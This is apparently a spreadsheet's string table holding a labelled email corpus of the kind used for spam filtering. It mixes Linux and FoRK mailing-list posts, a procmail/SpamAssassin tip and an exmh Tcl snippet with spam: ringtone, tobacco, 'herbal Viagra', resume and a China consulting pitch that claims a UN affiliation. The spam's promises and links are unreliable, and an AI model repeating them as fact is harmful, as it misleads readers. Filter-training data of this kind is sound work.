         &lt;/tr&gt;
         &lt;tr&gt; 
           &lt;td bordercolor="#FFFFFF" bgcolor="#FFFFFF"&gt; 
             &lt;div align="center"&gt;&lt;font face="Arial, Helvetica, sans-serif" color="#9900FF" size="2"&gt;&amp;nbsp;&lt;b&gt;&amp;nbsp;It's 
               real simple! No confusing downloads &lt;br&gt;
               or installations.Simple phone activation!&lt;/b&gt;&lt;/font&gt;&lt;/div&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt; 
           &lt;td bordercolor="#FFFFFF" bgcolor="#FFFFFF"&gt;&amp;nbsp;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt; 
           &lt;td bordercolor="#FFFFFF" bgcolor="#FFFFFF"&gt; 
             &lt;div align="center"&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;&lt;a href="http://freesite010.merchantnet.biz/index.html"&gt;&lt;font size="3"&gt;&lt;b&gt;&lt;font size="4" color="#00FF00"&gt;&amp;#149; 
               &amp;#149; &amp;#149; &lt;/font&gt;&lt;font size="4"&gt;Click Here to order&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;a href="http://freesite010.merchantnet.biz/index.html"&gt;&lt;font size="3"&gt;&lt;b&gt;&lt;font size="4" color="#00FF00"&gt; 
               &amp;#149; &amp;#149; &amp;#149; &lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;/font&gt;&lt;/div&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt; 
           &lt;td bordercolor="#FFFFFF" bgcolor="#FFFFFF"&gt; 
             &lt;div align="center"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;There 
               are tons of songs and graphics to choose from.&lt;br&gt;
               See a sample of some of the songs to choose from below:&lt;/font&gt;&lt;/div&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt; 
           &lt;td bordercolor="#FFFFFF" bgcolor="#FFFFFF"&gt; 
             &lt;table width="350" border="0" cellspacing="1" cellpadding="0"&gt;
               &lt;tr&gt; 
                 &lt;td width="206"&gt;&amp;nbsp;&lt;/td&gt;
                 &lt;td width="141"&gt;&amp;nbsp;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr bgcolor="#FF0000"&gt; 
                 &lt;td width="206"&gt;&lt;b&gt;&lt;font size="2" color="#FFFFFF" face="Arial, Helvetica, sans-serif"&gt;SONG&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                 &lt;td width="141"&gt;&lt;b&gt;&lt;font size="2" color="#FFFFFF" face="Arial, Helvetica, sans-serif"&gt;ARTIST&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt; 
                 &lt;td width="206"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;Get 
                   Ur Freak On&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="141"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;Missy 
                   Elliott&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt; 
                 &lt;td width="206"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;Billie 
                   Jean&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="141"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;Michael 
                   Jackson&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt; 
                 &lt;td width="206"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;Batman&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="141"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;Danny 
                   Elfman&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt; 
                 &lt;td width="206"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;Walk 
                   Like an Egyptian&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="141"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;Bangles&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt; 
                 &lt;td width="206"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;Flinstones&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="141"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;Barbera&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt; 
                 &lt;td width="206"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;4 
                   Page Letter&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="141"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;Aaliyah&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt; 
                 &lt;td width="206"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;Like 
                   a Virgin&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="141"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;Madonna&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt; 
                 &lt;td width="206"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;What's 
                   It Gonna Be?&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="141"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;B.Rhymes/J.Jackson&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt; 
                 &lt;td width="206"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;Achy 
                   Breaky Heart&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="141"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;Billy 
                   Ray Cyrus&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt; 
                 &lt;td width="206"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;Star 
                   Spangled Banner&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="141"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;John 
                   Smith&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt; 
           &lt;td bordercolor="#FFFFFF" bgcolor="#FF0000" height="2"&gt;&amp;nbsp;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt; 
           &lt;td bordercolor="#FFFFFF" bgcolor="#FFFFFF"&gt; 
             &lt;div align="center"&gt;&lt;font size="2" color="#000000" face="Arial, Helvetica, sans-serif"&gt;When 
               you are ready to order, just&lt;/font&gt;&lt;/div&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt; 
           &lt;td bordercolor="#FFFFFF" bgcolor="#FFFF00"&gt; 
             &lt;div align="center"&gt;&lt;font size="2" color="#FF0000" face="Arial, Helvetica, sans-serif"&gt; 
               &lt;a href=http://217.106.55.106/index.html&gt;&lt;b&gt;&lt;font size="5"&gt;&amp;#149;&amp;#149;&amp;#149;&amp;#149;&amp;#149;click here!&lt;/font&gt;&lt;font size="5"&gt;&amp;#149;&amp;#149;&amp;#149;&amp;#149;&amp;#149;&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;/div&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt; 
           &lt;td bordercolor="#FFFFFF" bgcolor="#FFFFFF"&gt; 
             &lt;div align="center"&gt;&lt;font size="2" face="Arial, Helvetica, sans-serif"&gt;and 
               we will deliver your new tunes or graphics &lt;br&gt;
               via satellite in under 5 minutes.&lt;/font&gt;&lt;/div&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt; 
           &lt;td bordercolor="#FFFFFF" bgcolor="#FFFFFF"&gt; 
               &lt;font face=verdana size=+2&gt;&lt;center&gt;&lt;b&gt; Take yourself out of our list &lt;a href=http://freesite010.merchantnet.biz/remove.html&gt;&lt;font color=green&gt;BY CLICKING HERE&lt;/font&gt;&lt;/a&gt;&lt;/font&gt;&lt;/center&gt;&lt;/div&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
 &lt;/html&gt;
 84221111000000
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt; hmm, I've never used gentoo
 &gt; so I'll have to take your word
 &gt; on that.  Perhaps something
 &gt; similar to that Ximian RedHat
 &gt; dealy would be cool.  Like
 &gt; a gui installer for slackware![1]
 &gt; 
 &gt; ;]
 &gt; 
 &gt; shane
 &gt; 
 &gt; [1]I'm shure Patrick V. would love
 &gt; that.(not)
 Or slackware with ports... not portage.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">To remove see below.
 I work with a company that submits
 web sites to search engines and saw
 your listing on the internet.
 We can submit your site twice a month
 to over 400 search engines and directories
 for only $29.95 per month.
 We periodically mail you progress
 reports showing where you are ranked.
 To get your web site in the fast lane
 call our toll free number below!
 Sincerely,
 Mike Bender
 888-892-7537
 * All work is verified
 To be removed call: 888-800-6339 X1377
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG-Social] Low Price Tobacco
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Dear Sir or Madam
 In the past you have requested information on discounted products. We hope that you find this of interest. If you are not a smoker, and find this email offensive, we sincerely apologise!  We will be only too happy to take you off our mailing list.
 If you are a smoker, however, and are fed up with paying high prices for your cigarettes and tobacco, take a look at what we have to offer  by clicking on this link.
 http://www.smokersassociation.co.uk/?S=15&amp;ID=2
 We can send you, legally, by registered air mail, direct to your door, 4 cartons of cigarettes or 40 pouches of rolling tobacco (all brands are available) from only 170 Euros - about 105 pounds - fully inclusive of postage and packing.  Why pay more?
 To remove yourself from our mailing list, please click below
 mailto:smokersclub@terra.es
 Yours faithfully.
 Smokers Association
 http://www.smokersassociation.co.uk/?S=15&amp;ID=2
 xay3171011y
 -- 
 Irish Linux Users' Group Social Events: social@linux.ie
 http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Adam Beberg writes:
 &gt; Shouldn't a politician know not to tell the truth? Odds he's impeached by
 As the article you forwarded explained in the second line of text,
 this politician is a woman.
 &gt; next Monday? [ob: no-clue-how-they-remove-mayors-in-italy]
 ob: no-clue-full-stop, as in nearly all Adam Beberg posts.
 -- 
 &lt;kragen@pobox.com&gt;       Kragen Sitaker     &lt;http://www.pobox.com/~kragen/&gt;
 Edsger Wybe Dijkstra died in August of 2002.  The world has lost a great
 man.  See http://advogato.org/person/raph/diary.html?start=252 and
 http://www.kode-fu.com/geek/2002_08_04_archive.shtml for details.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Herbal Viagra 30 day trial....              LMK
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;&lt;/title&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#FFFFFF"&gt;
 &lt;table width=3D500 cellpadding=3D10 border=3D0&gt;&lt;tr&gt;
 &lt;td&gt;&lt;font  face=3D"bankgothic, western" color=3D"#6600FF"  size=3D5&gt;&lt;p&gt;&lt;b&gt;
 &lt;a href=3D"http://www.mailcomesandgoes.com/ang/index.asp?id=3D609"&gt;
 Mother Natures all Natural Marital Aid&lt;br&gt; for Men and Women - Your's Risk=
  Free!&lt;/b&gt;&lt;/p&gt;&lt;/font&gt;
 &lt;font face=3D"arial black" color=3D"#000000" size=3D3&gt;&lt;p&gt;The all natural s=
 afe formula for men and women your's risk free for 30 days. Mother Nature'=
 s wonder pill of the 21st century.&lt;p&gt;
 &lt;li&gt;Increased Sensation&lt;/li&gt;&lt;br&gt;&lt;li&gt;Increased Frequency&lt;/li&gt;&lt;br&gt;
 &lt;li&gt;Increased Pleasure&lt;/li&gt;&lt;br&gt;&lt;li&gt;Increased Desire&lt;/li&gt;&lt;br&gt;
 &lt;li&gt;Increased Stamina&lt;/li&gt;&lt;br&gt;&lt;li&gt;Increased Libido&lt;/li&gt;&lt;/font&gt;&lt;br&gt;&lt;br&gt;
 Both male and female formulas!&lt;br&gt;&lt;p&gt;&lt;body bgcolor=3D"#FFFFFF"&gt;
 Order Your  Trial Today !&lt;/a&gt;&lt;/p&gt;&lt;/font&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;table width=3D500 cellpadding=3D10 border=3D0&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font face=3Darial size=3D1.5&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;p&gt;to depart from further contac=
 ts
 &lt;a href=3D"http://www.mailcomesandgoes.com/ang/service.html"&gt;visit here&lt;/a=
 &gt;&lt;/p&gt;&lt;/font&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 donmir
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Snag Ware
</t>
  </si>
  <si>
    <t xml:space="preserve">We were sitting here talking about Opera, and the fact that it's not free 
 anymore (unless you want the scrollypollies),  and how that sucked and 
 stuff, and someone said something about  nagware, and I misinterpretted it 
 as snag ware, which mainly means, oh  yeh, right, I'm gonna buy this 
 -eyeroll- where's someone with a key?  LOL  So who is it again who's on 
 this list who's associated with Opera?  Why's the free one using the same 
 LAME idea netzero, etc useD?   I know what kind of  costs are involved in 
 creating software like this, and I understand everyone needs to eat, but 
 if someone can get netscape for free, and opera isn't free, then, hmmm...  
 I imagine this email is going to bring some bricks down on my head, but 
 well, go for it, I gots my helmet.  (:
 Cindy
 P.S. GregB, you there?  (:
 -- 
 "I don't take no stocks in mathematics, anyway" --Huckleberry Finn
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
 --- begin forwarded text
 Status:  U
 To: rah@shipwright.com
 From: hacker@vudu.net
 Date: Thu, 03 Oct 2002 06:01:38 -0700 (PDT)
 Subject: Re: The 3rd Annual Consult Hyperion Digital Identity Forum
 The guy messed up his own URL. It should be
 http://www.digitalidforum.com which redirects to
 http://www.consult.hyperion.co.uk/digid3.html
 "R. A. Hettinga" wrote:
 &gt;
 &gt; Dear All,
 &gt;
 &gt; See www.digitalidentityforum.com for more details. Speakers
 include
 &gt; Microsoft and Liberty Alliance, UK central and local government,
 &gt; law
 &gt; enforcement, financial services (Egg and RBS/NatWest), EC
 Research
 &gt; Centre, a
 &gt; psychologist and others. Look forward to seeing you there.
 &gt;
 &gt; Regards,
 &gt; Dave Birch.
 &gt;
 &gt; --
 &gt; -- David Birch, Director, Consult Hyperion
 &gt; --
 &gt; -- tel +44 (0)1483 301793, fax +44 (0)1483 561657
 &gt; -- mail dave@chyp.com, web &lt;a
 href="http://mail.vudu.net//jump/http://www.chyp.com"&gt;http://www.chyp.com&lt;/a&gt;
 &gt; --
 &gt; -- See you at the 2nd Annual Digital Transactions Forum in
 &gt; Singapore
 &gt; -- October 16th/17th 2002, see
 &gt; &lt;a
 href="http://mail.vudu.net//jump/http://www.digitaltransactionsforum.com"&gt;http://www.digitaltransactionsforum.com&lt;/a&gt;/
 &gt;
 &gt; --- end forwarded text
 &gt;
 &gt;
 &gt; --
 &gt; -----------------
 &gt; R. A. Hettinga &amp;lt;mailto: rah@ibuc.com&amp;gt;
 &gt; The Internet Bearer Underwriting Corporation &amp;lt;&lt;a
 href="http://mail.vudu.net//jump/http://www.ibuc.com/&amp;gt"&gt;http://www.ibuc.com/&amp;gt&lt;/a&gt;;
 &gt; 44 Farquhar Street, Boston, MA 02131 USA
 &gt; &amp;quot;... however it may deserve respect for its usefulness and
 &gt; antiquity,
 &gt; [predicting the end of the world] has not been found agreeable to
 &gt; experience.&amp;quot; -- Edward Gibbon, 'Decline and Fall of the
 Roman
 &gt; Empire'
 &gt;
 &gt; For help on using this list (especially unsubscribing), send a
 &gt; message to
 &gt; &amp;quot;dcsb-request@reservoir.com&amp;quot; with one line of text:
 &amp;quot;help&amp;quot;.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_______________________________________________
 Irregulars mailing list
 Irregulars@tb.tf
 http://tb.tf/mailman/listinfo/irregulars
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAtalk] help with postfix + spamassassin
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Luiz Felipe Ceglia said:
 &gt; 	:0fw
 &gt; 	| /usr/bin/spamassassin -c 
 &gt; 			/etc/mail/spamassassin/rules
 are you using exactly that -- with the line break -- or is it like this:
   :0fw
   | /usr/bin/spamassassin -c /etc/mail/spamassassin/rules
 all on one line?  it should be the latter.
 --j.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</si>
  <si>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enter Chinese market
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir or Madam:
 Please reply to 
 Receiver: China Enterprise Management Co., Ltd. (CMC)
 E-mail: unido@chinatop.net
 As one technical organization supported by China Investment and Technical Promotion Office of United Nation Industry Development Organization (UNIDO), we cooperate closely with the relevant Chinese Quality Supervision and Standardization Information Organization. We provide the most valuable consulting services to help you to open Chinese market within the shortest time:
 1. Consulting Service on Mandatory National Standards of The People's Republic of China.
 2. Consulting Service on Inspection and Quarantine Standards of The People's Republic of China.
 3. Consulting Service for Permission to Enter Chinese Market
 We are very sorry to disturb you! 
 More information, please check our World Wide Web: http://www.chinatop.net
 Sincerely yours
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: [Razor-users] Reducing impact from tons of email
</t>
  </si>
  <si>
    <t xml:space="preserve">See your /etc/sendmail.cf file, there are a number of methods for limiting
 the number of concurrent sendmail processes, either by load average (I'm
 sure), or concurrency (I think)... I use sendmail anymore (I use qmail) but
 I'm sure that if you look in the config file, you will see what you need...
 Regards,
 Adam
 &gt; -----Original Message-----
 &gt; From: razor-users-admin@example.sourceforge.net
 &gt; [mailto:razor-users-admin@lists.sourceforge.net]On Behalf Of Joe Berry
 &gt; Sent: Sunday, 25 August 2002 1:44 PM
 &gt; To: razor-users@example.sourceforge.net
 &gt; Subject: [Razor-users] Reducing impact from tons of email
 &gt;
 &gt;
 &gt; I'm not sure if this is really a razor problem/issue or a sendmail
 &gt; problem. Here's the scenario... My mail server is a 150mhz PC funning
 &gt; FreeBSD 4.4. Ordinarily, the machine is quite idle; it supports my
 &gt; wife's web site with Apache server running on it and a few other
 &gt; services (jabber, etc). Between the various members of our family, we
 &gt; get a fair amount of email coming in (mailing lists, etc). On
 &gt; occasion, our DSL-based ISP dies for a number of hours. When we get a
 &gt; reconnection to the Internet, I get a huge flow of emails coming in
 &gt; which are then filtered via razor. As a result, I will sometimes see
 &gt; over 20+ sendmail processes running at the same time after such an
 &gt; occasion. The machine is then REALLY slow.
 &gt;
 &gt; I noticed that my /etc/procmailrc file had had no arguments associated
 &gt; with the call to razor-check. There was something in the log, though,
 &gt; to make me suspicious that it was possibly not seeing all my razor
 &gt; files. So I have just added "-home /etc/razor" as an argument. I
 &gt; haven't had any down time since then so I cannot comment on whether
 &gt; this change has sped up my razor processing a noticable amount. (This
 &gt; paragraph may be an aside to my real problem, the first paragraph
 &gt; above; but I thought I should be complete in my description.)
 &gt;
 &gt; At any rate, has anyone else suffered from a backlog of email
 &gt; processing creating lots and lots of sendmail processes?  Is there,
 &gt; perhaps, a way to limit the number of sendmail processes?
 &gt;
 &gt; Any ideas would be welcome.
 &gt;
 &gt; Thanks,
 &gt; Joe
 &gt; ---
 &gt; Joe Berry
 &gt; joe@topshot.com
 &gt; AIM "joe topshot"
 &gt; Yahoo Msgr "joetopshot"
 &gt; jabber "joetopshot@topshot.com"
 &gt; Baltimore, MD
 &gt;
 &gt;
 &gt;
 &gt; -------------------------------------------------------
 &gt; This sf.net email is sponsored by: OSDN - Tired of that same old
 &gt; cell phone?  Get a new here for FREE!
 &gt; https://www.inphonic.com/r.asp?r=sourceforge1&amp;refcode1=vs3390
 &gt; _______________________________________________
 &gt; Razor-users mailing list
 &gt; Razor-users@lists.sourceforge.net
 &gt; https://lists.sourceforge.net/lists/listinfo/razor-users
 &gt;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</si>
  <si>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On Wed, 24 Jul 2002, Tom wrote:
 &gt; "Around the world, there is a growing sense that democracy has not
 &gt; delivered development" Sakiko Fukuda-Parr UN report author
 Or perhaps it is the unregulated and out of control capitalism used as a
 tool to concentrate wealth and form a greed-based society?
 I notice the top 5 have a good amount of socialism in their systems to
 regulate the capitalism, especially in things like health care and
 education.
 Just look at our health care - no insurance = no care. Or education - gimme
 my voucher so I can get my kids out of the system while their IQ is still
 over 20.
 South American countries are currently figuring out just where this
 greed-based system ends up, and are looking for a way out.
 It was a fun ride tho wasnt it?
 - Adam L. "Duncan" Beberg
   http://www.mithral.com/~beberg/
   beberg@mithral.com
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Found your resume . . . . .
</t>
  </si>
  <si>
    <t xml:space="preserve">
 ===========================================================
                   PROVEN WAY TO GET A JOB!
 ===========================================================
 LOS ANGELES - April 22, 2002 - One simple form gets your resume
 on 75 career sites like Monster, HotJobs, Job.com, Dice &amp; more.
 In about 15 minutes your resume can be seen by 1.5 million
 employers and recruiters daily.
 Try it now at http://start.resumerabbit.com
 ============================================================
            POST YOUR RESUME TO MULTIPLE CAREER SITES
 ============================================================
 In today's job market it's important to get your resume in
 front of as many hiring managers as possible.  A new service
 at http://start.resumerabbit.com will instantly post your resume
 to Monster.com, Job.com, Headhunter.net, Dice and other top
 jobs sites, searched by millions of hiring managers daily.
 ResumeRabbit's one-stop form takes about 15 minutes and will
 save you over 60 hours of research and data entry.
 Once posted, your resume will be seen by the 1.5 million
 employers and recruiters that search all the career sites every
 day. To post your resume on 75 career sites go to:
 http://start.resumerabbit.com
 ============================================================
                   WHAT JOB SEEKERS HAVE TO SAY
 ============================================================
 "I got the account on Sunday evening and by Monday morning I
 was already getting phone calls from recruiters. That was fast
 nd easy. There are so many job sites out there it would have
 taken weeks. Thanks."
      Ronnie R, a Sales Representative
 "WOW! What a Service!  I signed up on a Tuesday, and by Thursday
 the job offers started pouring in. By Friday, I had a job set up!
 This is the Best investment I have ever made! THANKS!
      James M, Technical Support Specialist
 ============================================================
                   QUICK &amp; EASY. TRY IT NOW!
 ============================================================
 It's a tough job market right now. To succeed, you need to play
 the numbers.  Get maximum exposure now.  Just fill out one easy
 form and be instantly posted to over 75 career sites. Just go to
 http://start.resumerabbit.com
 ============================================================
 The staff of All-Execs.com have years of recruiting experience
 and may from time to time send you a review of different career
 tools that have helped others in their job search.  If you'd
 rather not receive these reviews, reply to this note with
 "Remove" in the subject line.
 Sincerely,
 Dan Johnson
 djohnson@allexecs.com
</t>
  </si>
  <si>
    <t xml:space="preserve">TimH:
 &gt;Its possibly a different Shauna Lowery: The one I'm talking about is 
 &gt;about 7 foot tall and presents "Animal Hospital" or something like 
 &gt;that.
 Ahhh, I'm getting my Lowry's(sp) mixed up
 I was thinking of Lowry Turner of DIY SOS
 about 3 feet shorter
 Dave
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: UCI Creative Writing
</t>
  </si>
  <si>
    <t xml:space="preserve">More articles that support my fantasy that Irvine is the
 center of the universe.  We've got the corner on electric
 cars, fuel cells, two types of Nobel winning physics,
 outside the box computer science, and lot of creative writers.
 UCI's creative writing department has been in the 
 news a lot over the course of the last decade.  Some
 quotes from the article[1]:
    "In 1992, Newsweek called UCI's fiction writing workshop
     'the hottest writing program in the country.' Now it's
     exponentially hotter, thanks only in part to Sebold's daring
     and uncannily timely novel. 
 The novel they are talking about is Alice Sebold's "The
 Lovely Bones" which is on the way to the top of the 
 NY Times best-sellers list.  My uncle used to tease me
 about UCI (being a USC graduate from '54) that nobody
 knew who UC Irvine was just two states over.  In fact,
 I used to refer to UCI as one of the lesser known UC
 schools, and when I went off to college in 1985, my
 relatives told everyone I was off to Cal State Irvine. 
 I took a class as an undergrad by one of the department's 
 faculty called "the art of writing fiction".   If there
 was ever any two classes that helped contributed to writing
 my dissertation, it was that one which taught me how to
 get the writing flowing and my high school typing class
 which taught me how to type really fast.  
 One of the advantages they cite in the article is that they
 seem to take a chance on the "not-so-sure" bet, but according
 to the article, the number of UCI graduates that have gone on
 to write best sellers and the handful that feed the film industry
 is creating a viscious cycle that lures more talent which
 creates the right writing ecosystem, which churns out more
 success stories which lures more talent.  
 Greg
 [1] http://www.ocregister.com/sitearchives/2002/8/25/news/uci00825cci1.shtml
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: alsaplayer for (null)
</t>
  </si>
  <si>
    <t xml:space="preserve">I spun another AlsaPlayer build, this time on my (null) box. I do not know what this
 means but the Curl stuff compiled in this time.
 It's sounding damn cool with the new alsa drivers. Thanks to Matthias for the Alsa
 RPMS. Great job bring sound to the masses.
 http://www.dudex.net/rpms/alsaplayer-0.99.71-aap2.i386.rpm
 http://www.dudex.net/rpms/alsaplayer-0.99.71-aap2.i686.rpm
 http://www.dudex.net/rpms/alsaplayer-0.99.71-aap2.src.rpm
 http://www.dudex.net/rpms/alsaplayer-0.99.71.spec
 --
 That's "angle" as in geometry.
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] Gentoo Linux
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Has anybody on the list installed/used this distro? If so wouldn't mind a bit 
 of help.
  Burnt the ISO's from the latest Linux Format magazine. Took a couple of 
 attempts to install but got there. My problem - I have a standard dial-up 
 modem and the installation gives you the network card setup so internet 
 download is out of the question, but, I installed the Stage3 tarball which 
 puts the .tgz files on your harddrive. 
  So methinks, I have the software there and all I need to do is install so as 
 1) get the necessary programmes to connect to the net and 2) install any 
 other programmes I might need.
  What actually happens is that if, for example, I attempt to install the KDE 
 package, the system goes looking for any dependencies on the net despite the 
 fact that the dependencies reside on my hard drive. Obviously I can't install 
 anything.
  Have checked all docs on the web page and nothing deals with a standard 
 dial-up modem or how to tell the package manager to look for the dependencies 
 on the hard drive.
  Anybody able to help me here?
  Thanks in anticipation.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Data-mine your hard-drive with SixDegrees
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85524557
 Date: Not supplied
 SixDegress is a $99 OS X app that data-mines your own hard-drive and tries to 
 build links between people, files and folders. Laura Carpenter at the OS X con 
 was talking it up yesterday and it looks way cool -- I've just downloaded the 
 demo to play with. 
     * Locate files with similar names or file revisions, anywhere on your 
     system.
     * Show all email threads related to any file or person on your desktop.
     * View all the files a person has sent you, regardless of where those files 
     are stored on your computer.
     * Create dynamic, self-updating projects.
     * Find misfiles or attachments quickly without searching desktop folders.
     * Navigate and open any message, file or person on your desktop in one 
     click.  
 Link[1] Discuss[2] (_Thanks, Laura!_)
 [1] http://www.creo.com/sixdegrees/
 [2] http://www.quicktopic.com/boing/H/VRMgpHLfGxpZ
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Ximian Updates] Ximian Security Updates
</t>
  </si>
  <si>
    <t xml:space="preserve">The Ximian Security Team has been issuing advisories for security 
 problems in Ximian GNOME for some time now at this URL:
 http://support.ximian.com/s?&amp;p_cat_lvl1=12
 Starting today we will begin to also email security advisories to
 this list (updates@ximian.com) to raise the awareness of potential 
 problems.
 The Ximian Security Team
 _______________________________________________
 updates maillist  -  updates@ximian.com
 http://lists.ximian.com/mailman/listinfo/updates
 Please DO NOT reply to this list!  Use bugs@helixcode.com or hello@helixcode.com instead.
</t>
  </si>
  <si>
    <t xml:space="preserve">
 [I wrote this last night but it appears I never sent it... still 
 haven't had time to dig in to it...]
 &gt;&gt;&gt;&gt;&gt; On Tue, 1 Oct 2002, "Robert" == Robert Elz wrote:
   Robert&gt; No, but using PickMarkSeen (and pick(ids)) as an
   Robert&gt; alternative to just doing
   Robert&gt; Seq_Del $exmh(folder) $mhProfile(unseen-sequence) $results
 Ah.  Neither Ted nor I were particularly up to date.  I pulled 
 down the lates from CVS and am now running with it.  I miss the 
 blue ftoc lines but I'll sort that out soon, iirc Chris said 
 it's a simple resource change.
 Ted's code to "ketchup" made use of some of the procs that went 
 away in the sequence generalization.  I've fixed it up... almost 
 and it looks like this now:
 proc Cabeen_Mark2CurSeen {} {
     global exmh mhProfile msg
     set results {}
     Exmh_Status "Clearing unseen up to cur..." red
     Mh_SetCur $exmh(folder) $msg(id)
     set unseen [Mh_Sequence $exmh(folder) $mhProfile(unseen-sequence) ]
     foreach elem $unseen {
          if { $elem &lt;= $msg(id) } {
             lappend results $elem
          }
     }
     busy Seq_Del $exmh(folder) $mhProfile(unseen-sequence) $results
     Exmh_Status ok blue
 }
 The "almost" is because it's not updating the highlighting on 
 the ftoc.  I'm too tired to go figure out how to fix that just 
 now and have to move on to other stuff.  If someone wants to 
 forward me a clue feel free.
 Now that I've got all of Chris' sequence stuff I discovered that 
 my sequences are ... cluttered.
 --Hal
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
